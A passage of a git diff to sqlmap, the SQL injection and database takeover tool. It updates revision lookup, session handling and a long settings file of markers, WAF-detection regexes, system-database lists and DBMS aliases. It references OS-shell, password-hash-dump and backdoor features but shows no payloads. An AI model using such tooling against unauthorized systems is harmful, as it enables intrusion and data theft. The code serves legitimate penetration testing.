UNICODE_ENCODING) + errMsg += "located at '%s'" % self.parent.dbpath + raise SqlmapGenericException(errMsg) def insert(self, values): """ @@ -66,11 +80,14 @@ def insert(self, values): errMsg = "wrong number of columns used in replicating insert" raise SqlmapValueException(errMsg) - def execute(self, sql, parameters=[]): + def execute(self, sql, parameters=None): try: - self.parent.cursor.execute(sql, parameters) - except sqlite3.OperationalError, ex: - errMsg = "problem occurred ('%s') while accessing sqlite database " % ex + try: + self.parent.cursor.execute(sql, parameters or []) + except UnicodeError: + self.parent.cursor.execute(sql, cleanReplaceUnicode(parameters or [])) + except sqlite3.OperationalError as ex: + errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING) errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath errMsg += "it's not used by some other program" raise SqlmapGenericException(errMsg) @@ -89,10 +106,12 @@ def select(self, condition=None): """ This function is used for selecting row(s) from current table. 
""" - _ = 'SELECT * FROM %s' % self.name + query = 'SELECT * FROM "%s"' % self.name if condition: - _ += 'WHERE %s' % condition - return self.execute(_) + query += ' WHERE %s' % condition + + self.execute(query) + return self.parent.cursor.fetchall() def createTable(self, tblname, columns=None, typeless=False): """ diff --git a/lib/core/revision.py b/lib/core/revision.py index f86f9b5256f..e5e1a1e76f3 100644 --- a/lib/core/revision.py +++ b/lib/core/revision.py @@ -1,54 +1,62 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os import re +import subprocess -from subprocess import PIPE -from subprocess import Popen as execute +from lib.core.common import openFile +from lib.core.convert import getText def getRevisionNumber(): """ Returns abbreviated commit hash number as retrieved with "git rev-parse --short HEAD" + + >>> len(getRevisionNumber() or (' ' * 7)) == 7 + True """ retVal = None filePath = None - _ = os.path.dirname(__file__) + directory = os.path.dirname(__file__) while True: - filePath = os.path.join(_, ".git", "HEAD") - if os.path.exists(filePath): + candidate = os.path.join(directory, ".git", "HEAD") + if os.path.exists(candidate): + filePath = candidate break - else: - filePath = None - if _ == os.path.dirname(_): - break - else: - _ = os.path.dirname(_) - while True: - if filePath and os.path.isfile(filePath): - with open(filePath, "r") as f: - content = f.read() - filePath = None - if content.startswith("ref: "): - filePath = os.path.join(_, ".git", content.replace("ref: ", "")).strip() - else: - match = re.match(r"(?i)[0-9a-f]{32}", content) - retVal = match.group(0) if match else None - break - else: + parent = os.path.dirname(directory) + if parent == directory: break + directory = parent + + if filePath: + with openFile(filePath, "r") as f: + content = getText(f.read()).strip() + + if content.startswith("ref: "): + ref_path = content.replace("ref: ", "").strip() + filePath = os.path.join(directory, ".git", ref_path) + + if os.path.exists(filePath): + with openFile(filePath, "r") as f_ref: + content = getText(f_ref.read()).strip() + + match = re.match(r"(?i)[0-9a-f]{40}", content) + retVal = match.group(0) if match else None if not retVal: - process = execute("git rev-parse --verify HEAD", shell=True, stdout=PIPE, stderr=PIPE) - stdout, _ = process.communicate() - match = re.search(r"(?i)[0-9a-f]{32}", stdout or "") - retVal = match.group(0) if match else None + try: + process = subprocess.Popen(["git", "rev-parse", "--verify", "HEAD"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + stdout, _ = process.communicate() + match = re.search(r"(?i)[0-9a-f]{40}", getText(stdout or "")) + retVal = match.group(0) if match else None + except: + pass return retVal[:7] if retVal else None diff --git a/lib/core/session.py b/lib/core/session.py index 630767c57cc..c26e4dc0951 100644 --- a/lib/core/session.py +++ b/lib/core/session.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re @@ -25,13 +25,15 @@ def setDbms(dbms): hashDBWrite(HASHDB_KEYS.DBMS, dbms) - _ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS])) - _ = re.search("^%s" % _, 
dbms, re.I) + _ = "(%s)" % ('|'.join(SUPPORTED_DBMS)) + _ = re.search(r"\A%s( |\Z)" % _, dbms, re.I) if _: dbms = _.group(1) Backend.setDbms(dbms) + if kb.resolutionDbms: + hashDBWrite(HASHDB_KEYS.DBMS, kb.resolutionDbms) logger.info("the back-end DBMS is %s" % Backend.getDbms()) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3edb4ecfd18..871d32e36c3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -1,61 +1,155 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import codecs import os +import platform +import random import re -import subprocess import string import sys +import time from lib.core.enums import DBMS from lib.core.enums import DBMS_DIRECTORY_NAME -from lib.core.revision import getRevisionNumber - -# sqlmap version and site -VERSION = "1.0-dev" -REVISION = getRevisionNumber() -VERSION_STRING = "sqlmap/%s%s" % (VERSION, "-%s" % REVISION if REVISION else "") +from lib.core.enums import OS +from thirdparty import six + +# sqlmap version (...) +VERSION = "1.10.1.85" +TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" +TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} +VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) DESCRIPTION = "automatic SQL injection and database takeover tool" -SITE = "http://sqlmap.org" +SITE = "https://sqlmap.org" +DEFAULT_USER_AGENT = "%s (%s)" % (VERSION_STRING, SITE) +DEV_EMAIL_ADDRESS = "dev@sqlmap.org" ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new" -GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git" -ML = "sqlmap-users@lists.sourceforge.net" +GIT_REPOSITORY = "https://github.com/sqlmapproject/sqlmap.git" +GIT_PAGE = "https://github.com/sqlmapproject/sqlmap" +WIKI_PAGE = "https://github.com/sqlmapproject/sqlmap/wiki/" +ZIPBALL_PAGE = "https://github.com/sqlmapproject/sqlmap/zipball/master" + +# colorful banner +BANNER = """\033[01;33m\ + ___ + __H__ + ___ ___[.]_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m +|_ -| . [.] | .'| . | +|___|_ [.]_|_|_|__,| _| + |_|V... 
|_| \033[0m\033[4;37m%s\033[0m\n +""" % (TYPE_COLORS.get(TYPE, 31), VERSION_STRING.split('/')[-1], SITE) # Minimum distance of ratio from kb.matchRatio to result in True DIFF_TOLERANCE = 0.05 CONSTANT_RATIO = 0.9 +# Ratio used in heuristic check for WAF/IPS protected targets +IPS_WAF_CHECK_RATIO = 0.5 + +# Timeout used in heuristic check for WAF/IPS protected targets +IPS_WAF_CHECK_TIMEOUT = 10 + +# Timeout used in checking for existence of live-cookies file +LIVE_COOKIES_TIMEOUT = 120 + # Lower and upper values for match ratio in case of stable page LOWER_RATIO_BOUND = 0.02 UPPER_RATIO_BOUND = 0.98 +# For filling in case of dumb push updates +DUMMY_JUNK = "theim1Ga" + # Markers for special cases when parameter values contain html encoded characters -PARAMETER_AMP_MARKER = "__AMP__" -PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__" +PARAMETER_AMP_MARKER = "__PARAMETER_AMP__" +PARAMETER_SEMICOLON_MARKER = "__PARAMETER_SEMICOLON__" +BOUNDARY_BACKSLASH_MARKER = "__BOUNDARY_BACKSLASH__" +PARAMETER_PERCENTAGE_MARKER = "__PARAMETER_PERCENTAGE__" PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__" PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__" -URI_QUESTION_MARKER = "__QUESTION_MARK__" -ASTERISK_MARKER = "__ASTERISK_MARK__" - -PAYLOAD_DELIMITER = "\x00" +URI_QUESTION_MARKER = "__URI_QUESTION__" +ASTERISK_MARKER = "__ASTERISK__" +REPLACEMENT_MARKER = "__REPLACEMENT__" +BOUNDED_BASE64_MARKER = "__BOUNDED_BASE64__" +BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION__" +SAFE_VARIABLE_MARKER = "__SAFE_VARIABLE__" +SAFE_HEX_MARKER = "__SAFE_HEX__" +DOLLAR_MARKER = "__DOLLAR__" + +RANDOM_INTEGER_MARKER = "[RANDINT]" +RANDOM_STRING_MARKER = "[RANDSTR]" +SLEEP_TIME_MARKER = "[SLEEPTIME]" +INFERENCE_MARKER = "[INFERENCE]" +SINGLE_QUOTE_MARKER = "[SINGLE_QUOTE]" +GENERIC_SQL_COMMENT_MARKER = "[GENERIC_SQL_COMMENT]" + +PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__" CHAR_INFERENCE_MARK = "%c" -PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7e-\xff]" +PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]" + +# Regular expression used for extraction of table names (useful for (e.g.) 
MsAccess) +SELECT_FROM_TABLE_REGEX = r"\bSELECT\b.+?\bFROM\s+(?P([\w.]|`[^`<>]+`)+)" + +# Regular expression used for recognition of textual content-type +TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)" # Regular expression used for recognition of generic permission messages -PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied" +PERMISSION_DENIED_REGEX = r"\b(?P(command|permission|access|user)\s*(was|is|has been)?\s*(denied|forbidden|unauthorized|rejected|not allowed))" + +# Regular expression used in recognition of generic protection mechanisms +GENERIC_PROTECTION_REGEX = r"(?i)\b(rejected|blocked|protection|incident|denied|detected|dangerous|firewall)\b" + +# Regular expression used to detect errors in fuzz(y) UNION test +FUZZ_UNION_ERROR_REGEX = r"(?i)data\s?type|mismatch|comparable|compatible|conversion|convert|failed|error|unexpected" + +# Upper threshold for starting the fuzz(y) UNION test +FUZZ_UNION_MAX_COLUMNS = 10 # Regular expression used for recognition of generic maximum connection messages -MAX_CONNECTIONS_REGEX = r"max.+connections" +MAX_CONNECTIONS_REGEX = r"\bmax.{1,100}\bconnection" + +# Maximum consecutive connection errors before asking the user if he wants to continue +MAX_CONSECUTIVE_CONNECTION_ERRORS = 15 + +# Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it) +PRECONNECT_CANDIDATE_TIMEOUT = 10 + +# Servers known to cause issue with pre-connection mechanism (because of lack of multi-threaded support) +PRECONNECT_INCOMPATIBLE_SERVERS = ("SimpleHTTP", "BaseHTTP") + +# Identify WAF/IPS inside limited number of responses (Note: for optimization purposes) +IDENTYWAF_PARSE_LIMIT = 10 -# Regular expression used for extracting results from google search -GOOGLE_REGEX = r"url\?\w+=(http[^>]+)&(sa=U|rct=j)" +# Maximum sleep time in "Murphy" (testing) mode +MAX_MURPHY_SLEEP_TIME = 3 + +# Regular expression used for extracting results from Google search +GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)" + +# Google Search consent cookie +GOOGLE_CONSENT_COOKIE = "CONSENT=YES+shp.gws-%s-0-RC1.%s+FX+740" % (time.strftime("%Y%m%d"), "".join(random.sample(string.ascii_lowercase, 2))) + +# Regular expression used for extracting results from DuckDuckGo search +DUCKDUCKGO_REGEX = r'= 7) TIME_STDEV_COEFF = 7 +# Minimum response time that can be even considered as delayed (not a complete requirement) +MIN_VALID_DELAYED_RESPONSE = 0.5 + # Standard deviation after which a warning message should be displayed about connection lags WARN_TIME_STDEV = 0.5 @@ -77,28 +174,43 @@ TIME_DELAY_CANDIDATES = 3 # Default value for HTTP Accept header -HTTP_ACCEPT_HEADER_VALUE = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" +HTTP_ACCEPT_HEADER_VALUE = "*/*" # Default value for HTTP Accept-Encoding header HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate" -# HTTP timeout in silent mode -HTTP_SILENT_TIMEOUT = 3 +# Default timeout for running commands over backdoor +BACKDOOR_RUN_CMD_TIMEOUT = 5 + +# Number of seconds to wait for thread finalization at program end +THREAD_FINALIZATION_TIMEOUT = 1 # Maximum number of techniques used in inject.py/getValue() per one value MAX_TECHNIQUES_PER_VALUE = 2 +# In case of missing piece of partial union dump, buffered array must be flushed after certain size +MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024 + +# 
Maximum size of cache used in @cachedmethod decorator +MAX_CACHE_ITEMS = 1024 + # Suffix used for naming meta databases in DBMS(es) without explicit database name METADB_SUFFIX = "_masterdb" +# Number of times to retry the pushValue during the exceptions (e.g. KeyboardInterrupt) +PUSH_VALUE_EXCEPTION_RETRY_COUNT = 3 + # Minimum time response set needed for time-comparison based on standard deviation -MIN_TIME_RESPONSES = 15 +MIN_TIME_RESPONSES = 30 + +# Maximum time response set used during time-comparison based on standard deviation +MAX_TIME_RESPONSES = 200 # Minimum comparison ratio set needed for searching valid union column number based on standard deviation MIN_UNION_RESPONSES = 5 # After these number of blanks at the end inference should stop (just in case) -INFERENCE_BLANK_BREAK = 10 +INFERENCE_BLANK_BREAK = 5 # Use this replacement character for cases when inference is not able to retrieve the proper character value INFERENCE_UNKNOWN_CHAR = '?' @@ -106,20 +218,23 @@ # Character used for operation "greater" in inference INFERENCE_GREATER_CHAR = ">" +# Character used for operation "greater or equal" in inference +INFERENCE_GREATER_EQUALS_CHAR = ">=" + # Character used for operation "equals" in inference INFERENCE_EQUALS_CHAR = "=" # Character used for operation "not-equals" in inference INFERENCE_NOT_EQUALS_CHAR = "!=" -# String used for representation of unknown dbms +# String used for representation of unknown DBMS UNKNOWN_DBMS = "Unknown" -# String used for representation of unknown dbms version +# String used for representation of unknown DBMS version UNKNOWN_DBMS_VERSION = "Unknown" -# Dynamicity mark length used in dynamicity removal engine -DYNAMICITY_MARK_LENGTH = 32 +# Dynamicity boundary length used in dynamicity removal engine +DYNAMICITY_BOUNDARY_LENGTH = 20 # Dummy user prefix used in dictionary attack DUMMY_USER_PREFIX = "__dummy__" @@ -127,86 +242,157 @@ # Reference: http://en.wikipedia.org/wiki/ISO/IEC_8859-1 DEFAULT_PAGE_ENCODING = "iso-8859-1" -# System variables -IS_WIN = subprocess.mswindows +try: + codecs.lookup(DEFAULT_PAGE_ENCODING) +except LookupError: + DEFAULT_PAGE_ENCODING = "utf8" + +# Marker for program piped input +STDIN_PIPE_DASH = '-' + +# URL used in dummy runs +DUMMY_URL = "http://foo/bar?id=1" + +# Timeout used during initial websocket (pull) testing +WEBSOCKET_INITIAL_TIMEOUT = 3 # The name of the operating system dependent module imported. 
The following names have currently been registered: 'posix', 'nt', 'mac', 'os2', 'ce', 'java', 'riscos' PLATFORM = os.name PYVERSION = sys.version.split()[0] +IS_WIN = PLATFORM == "nt" +IS_PYPY = platform.python_implementation() == "PyPy" -# Database management system specific variables -MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb") -MYSQL_SYSTEM_DBS = ("information_schema", "mysql") # Before MySQL 5.0 only "mysql" -PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast") -ORACLE_SYSTEM_DBS = ("CTXSYS", "DBSNMP", "DMSYS", "EXFSYS", "MDSYS", "OLAPSYS", "ORDSYS", "OUTLN", "SYS", "SYSAUX", "SYSMAN", "SYSTEM", "TSMSYS", "WMSYS", "XDB") # These are TABLESPACE_NAME +# Check if running in terminal +IS_TTY = hasattr(sys.stdout, "fileno") and os.isatty(sys.stdout.fileno()) + +# DBMS system databases +MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb", "Resource", "ReportServer", "ReportServerTempDB", "distribution", "mssqlsystemresource") +MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema", "sys", "ndbinfo") +PGSQL_SYSTEM_DBS = ("postgres", "template0", "template1", "information_schema", "pg_catalog", "pg_toast", "pgagent") +ORACLE_SYSTEM_DBS = ("ADAMS", "ANONYMOUS", "APEX_030200", "APEX_PUBLIC_USER", "APPQOSSYS", "AURORA$ORB$UNAUTHENTICATED", "AWR_STAGE", "BI", "BLAKE", "CLARK", "CSMIG", "CTXSYS", "DBSNMP", "DEMO", "DIP", "DMSYS", "DSSYS", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "HR", "IX", "JONES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OC", "OE", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "PAPER", "PERFSTAT", "PM", "SCOTT", "SH", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "TRACESVR", "TSMSYS", "WK_TEST", "WKPROXY", "WKSYS", "WMSYS", "XDB", "XS$NULL") SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master") -ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage",\ - "MSysAccessXML", "MSysModules", "MSysModules2") -FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE",\ - "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS",\ - "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES",\ - "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS",\ - "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS",\ - "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") +ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2", "MSysNavPaneGroupCategories", "MSysNavPaneGroups", "MSysNavPaneGroupToObjects", "MSysNavPaneObjectIDs") +FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", 
"RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN") -SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs") -DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\ - "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS") - +SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs", "tempdb") +DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS", "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS", "SYSDEBUG", "SYSINST") +HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB") +H2_SYSTEM_DBS = ("INFORMATION_SCHEMA",) + ("IGNITE", "ignite-sys-cache") +INFORMIX_SYSTEM_DBS = ("sysmaster", "sysutils", "sysuser", "sysadmin") +MONETDB_SYSTEM_DBS = ("tmp", "json", "profiler") +DERBY_SYSTEM_DBS = ("NULLID", "SQLJ", "SYS", "SYSCAT", "SYSCS_DIAG", "SYSCS_UTIL", "SYSFUN", "SYSIBM", "SYSPROC", "SYSSTAT") +VERTICA_SYSTEM_DBS = ("v_catalog", "v_internal", "v_monitor",) +MCKOI_SYSTEM_DBS = ("",) +PRESTO_SYSTEM_DBS = ("information_schema",) +ALTIBASE_SYSTEM_DBS = ("SYSTEM_",) +MIMERSQL_SYSTEM_DBS = ("information_schema", "SYSTEM",) +CRATEDB_SYSTEM_DBS = ("information_schema", "pg_catalog", "sys") +CLICKHOUSE_SYSTEM_DBS = ("information_schema", "INFORMATION_SCHEMA", "system") +CUBRID_SYSTEM_DBS = ("DBA",) +CACHE_SYSTEM_DBS = ("%Dictionary", "INFORMATION_SCHEMA", "%SYS") +EXTREMEDB_SYSTEM_DBS = ("",) +FRONTBASE_SYSTEM_DBS = ("DEFINITION_SCHEMA", "INFORMATION_SCHEMA") +RAIMA_SYSTEM_DBS = ("",) +VIRTUOSO_SYSTEM_DBS = ("",) +SNOWFLAKE_SYSTEM_DBS = ("INFORMATION_SCHEMA",) + +# Note: () + () MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms") -MYSQL_ALIASES = ("mysql", "my") -PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") -ORACLE_ALIASES = ("oracle", "orcl", "ora", "or") +MYSQL_ALIASES = ("mysql", "my") + ("mariadb", "maria", "memsql", "tidb", "percona", "drizzle", "doris", "starrocks") +PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") + ("cockroach", "cockroachdb", "amazon redshift", "redshift", "greenplum", "yellowbrick", "enterprisedb", "yugabyte", "yugabytedb", "opengauss") +ORACLE_ALIASES = ("oracle", "orcl", "ora", "or", "dm8") SQLITE_ALIASES = ("sqlite", "sqlite3") -ACCESS_ALIASES = ("msaccess", "access", "jet", "microsoft access") +ACCESS_ALIASES = ("microsoft access", "msaccess", "access", "jet") FIREBIRD_ALIASES = ("firebird", "mozilla firebird", "interbase", "ibase", "fb") -MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db") +MAXDB_ALIASES = ("max", "maxdb", "sap maxdb", "sap db") SYBASE_ALIASES = ("sybase", "sybase sql server") DB2_ALIASES = ("db2", "ibm db2", "ibmdb2") +HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql") +H2_ALIASES = ("h2",) + ("ignite", "apache ignite") +INFORMIX_ALIASES = ("informix", "ibm informix", "ibminformix") +MONETDB_ALIASES = ("monet", "monetdb",) +DERBY_ALIASES = ("derby", "apache derby",) +VERTICA_ALIASES = ("vertica",) +MCKOI_ALIASES = ("mckoi",) +PRESTO_ALIASES = ("presto",) +ALTIBASE_ALIASES = ("altibase",) +MIMERSQL_ALIASES = ("mimersql", "mimer") +CRATEDB_ALIASES = ("cratedb", "crate") +CUBRID_ALIASES = ("cubrid",) +CLICKHOUSE_ALIASES = ("clickhouse",) +CACHE_ALIASES = ("intersystems cache", "cachedb", "cache", "iris") +EXTREMEDB_ALIASES = ("extremedb", "extreme") +FRONTBASE_ALIASES = ("frontbase",) +RAIMA_ALIASES = 
("raima database manager", "raima", "raimadb", "raimadm", "rdm", "rds", "velocis") +VIRTUOSO_ALIASES = ("virtuoso", "openlink virtuoso") +SNOWFLAKE_ALIASES = ("snowflake",) DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_")) -SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES +SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CLICKHOUSE_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES + SNOWFLAKE_ALIASES) SUPPORTED_OS = ("linux", "windows") +DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES), (DBMS.SNOWFLAKE, SNOWFLAKE_ALIASES)) + USER_AGENT_ALIASES = ("ua", "useragent", "user-agent") REFERER_ALIASES = ("ref", "referer", "referrer") HOST_ALIASES = ("host",) +# DBMSes with upper case identifiers +UPPER_CASE_DBMSES = set((DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.H2, DBMS.HSQLDB, DBMS.DERBY, DBMS.ALTIBASE, DBMS.SNOWFLAKE)) + +# Default schemas to use (when unable to enumerate) +H2_DEFAULT_SCHEMA = HSQLDB_DEFAULT_SCHEMA = "PUBLIC" +VERTICA_DEFAULT_SCHEMA = "public" +MCKOI_DEFAULT_SCHEMA = "APP" +CACHE_DEFAULT_SCHEMA = "SQLUser" + +# DBMSes where OFFSET mechanism starts from 1 +PLUS_ONE_DBMSES = set((DBMS.ORACLE, DBMS.DB2, DBMS.ALTIBASE, DBMS.MSSQL, DBMS.CACHE)) + +# Names that can't be used to name files on Windows OS +WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9") + # Items displayed in basic help (-h) output BASIC_HELP_ITEMS = ( - "url", - "googleDork", - "data", - "cookie", - "randomAgent", - "proxy", - "testParameter", - "dbms", - "level", - "risk", - "tech", - "getAll", - "getBanner", - "getCurrentUser", - "getCurrentDb", - "getPasswordHashes", - "getTables", - "getColumns", - "getSchema", - "dumpTable", - "dumpAll", - "db", - "tbl", - "col", - "osShell", - "osPwn", - "batch", - "checkTor", - "flushSession", - "tor", - "wizard", - ) + "url", + "googleDork", + "data", + "cookie", + "randomAgent", + "proxy", + "testParameter", + "dbms", + "level", + "risk", + "technique", + "getAll", + "getBanner", + "getCurrentUser", + 
"getCurrentDb", + "getPasswordHashes", + "getDbs", + "getTables", + "getColumns", + "getSchema", + "dumpTable", + "dumpAll", + "db", + "tbl", + "col", + "osShell", + "osPwn", + "batch", + "checkTor", + "flushSession", + "tor", + "sqlmapShell", + "wizard", +) + +# Tags used for value replacements inside shell scripts +SHELL_WRITABLE_DIR_TAG = "%WRITABLE_DIR%" +SHELL_RUNCMD_EXE_TAG = "%RUNCMD_EXE%" # String representation for NULL value NULL = "NULL" @@ -217,34 +403,56 @@ # String representation for current database CURRENT_DB = "CD" +# String representation for current user +CURRENT_USER = "CU" + +# Name of SQLite file used for storing session data +SESSION_SQLITE_FILE = "session.sqlite" + +# Regular expressions used for finding file paths in error messages +FILE_PATH_REGEXES = (r"(?P[^<>]+?) on line \d+", r"\bin (?P[^<>'\"]+?)['\"]? on line 